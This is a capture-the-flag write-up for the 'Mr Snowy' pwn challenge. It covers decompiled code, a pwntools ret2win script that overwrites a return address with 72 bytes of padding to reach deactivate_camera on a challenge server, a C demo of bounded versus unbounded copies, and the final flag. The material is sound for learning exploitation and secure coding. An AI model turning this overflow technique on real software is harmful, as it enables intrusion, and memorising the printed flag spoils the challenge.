
Day 1: Mr Snowy

Challenge description

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
But, this ☃️ snowman... it scares me... He is always 👀 staring at Santa's house.
Something must be wrong with him.

Poking around

To be honest, I hate all the colour syntax highlighting introduced. It makes pwntools work poorly when receiving bytes and sending payloads. (At least on day 4, there are no more colours.)

Firstly, let's see what Ghidra says.

void snowman(void)

{
  int iVar1;
  char local_48 [64];

  printstr(&DAT_004019a8);
  fflush(stdout);
  read(0,local_48,2);
  iVar1 = atoi(local_48);
  if (iVar1 != 1) {
    printstr("[*] It\'s just a cute snowman after all, nothing to worry about..\n");
    color("\n[-] Mission failed!\n",&DAT_0040161a,&DAT_00401664);
    /* WARNING: Subroutine does not return */
    exit(-0x45);
  }
  investigate();
  return;
}

This looks like a classic stack buffer overflow. It also seems we have to deactivate something, and luckily there is a convenient function for exactly that.

void deactivate_camera(void)

{
  char acStack104 [48];
  FILE *local_38;
  char *local_30;
  undefined8 local_28;
  int local_1c;

  local_1c = 0x30;
  local_28 = 0x2f;
  local_30 = acStack104;
  local_38 = fopen("flag.txt","rb");
  if (local_38 == (FILE *)0x0) {
    fwrite("[-] Could not open flag.txt, please conctact an Administrator.\n",1,0x3f,stdout);
    /* WARNING: Subroutine does not return */
    exit(-0x45);
  }
  fgets(local_30,local_1c,local_38);
  puts("\x1b[1;32m");
  fwrite("[+] Here is the secret password to deactivate the camera: ",1,0x3a,stdout);
  puts(local_30);
  fclose(local_38);
  return;
}

Crafting our script:

from pwn import *

binary = context.binary = ELF("./mr_snowy")
deactivate = binary.sym.deactivate_camera

if args.REMOTE:
    p = remote('209.97.137.85', 32568)
else:
    p = process("./mr_snowy")
    gdb.attach(p, '''
    b *investigate+244
    c
    ''')

# choose option 1 so snowman() calls investigate()
p.recvuntil(b">")
p.sendline(b"1")

p.recvuntil(b">")

# 72 bytes of padding, then the address of deactivate_camera
payload = b"A" * 72
payload += p64(deactivate)

p.send(payload)
p.interactive()
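As an added illustration (not part of the original writeup or the challenge binary), the C program below models why the 72 bytes of padding in the script matter. It lays out a frame as a 64-byte buffer followed by the saved frame pointer and the return-address slot: a copy that trusts the input length walks straight over both slots, while a copy bounded by the buffer size leaves them untouched. The frame layout, the `unsafe_read`/`safe_read` functions, the sentinel value and the input bytes are all constructed for the demo; they are assumptions, not the real layout of `investigate()`.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed frame layout: a 64-byte input buffer, then the saved frame
 * pointer, then the return-address slot. This matches the 64 + 8 = 72
 * bytes of padding the exploit script uses, but is a model, not the
 * binary's actual stack frame. */
typedef struct {
    char     buf[64];
    uint64_t saved_rbp;
    uint64_t ret_slot;
} frame_t;

/* Constructed marker so the test can see whether a slot was touched. */
#define SENTINEL 0x4242424242424242ULL

/* Vulnerable pattern: copy as many bytes as the input carries, the way
 * a read() whose length exceeds the buffer would. Clamped to the frame
 * size only to keep the model well-defined. */
static size_t unsafe_read(frame_t *f, const unsigned char *in, size_t n) {
    if (n > sizeof(*f)) n = sizeof(*f);
    memcpy((unsigned char *)f, in, n);   /* overruns buf into the slots */
    return n;
}

/* Hardened pattern: the copy is bounded by the destination size and the
 * buffer is always NUL-terminated; surplus input is dropped. */
static size_t safe_read(frame_t *f, const unsigned char *in, size_t n) {
    size_t cap = sizeof(f->buf) - 1;
    if (n > cap) n = cap;
    memcpy(f->buf, in, n);
    f->buf[n] = '\0';
    return n;
}

/* Constructed input with the same shape as the writeup's payload:
 * 72 filler bytes followed by one 8-byte value. Returns total length. */
static size_t build_input(unsigned char *out, uint64_t tail) {
    memset(out, 'A', 72);
    memcpy(out + 72, &tail, sizeof tail);
    return 72 + sizeof tail;
}

/* Runs one reader over a fresh frame and returns what is left in the
 * return-address slot afterwards. */
static uint64_t slot_after(size_t (*reader)(frame_t *, const unsigned char *, size_t),
                           uint64_t tail) {
    frame_t f;
    unsigned char in[sizeof(frame_t)];
    memset(&f, 0, sizeof f);
    f.saved_rbp = SENTINEL;
    f.ret_slot  = SENTINEL;
    size_t n = build_input(in, tail);
    reader(&f, in, n);
    return f.ret_slot;
}

int main(void) {
    uint64_t tail = 0x401234ULL;   /* constructed placeholder value */
    printf("unbounded copy: ret_slot = 0x%016llx\n",
           (unsigned long long)slot_after(unsafe_read, tail));
    printf("bounded copy:   ret_slot = 0x%016llx\n",
           (unsigned long long)slot_after(safe_read, tail));
    return 0;
}
```

With the unbounded copy the slot ends up holding exactly the 8 bytes that followed the 72 bytes of filler; with the bounded copy it still holds the sentinel, which is the whole difference a length check makes here.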

Flag

Flag: HTB{n1c3_try_3lv35_but_n0t_g00d_3n0ugh}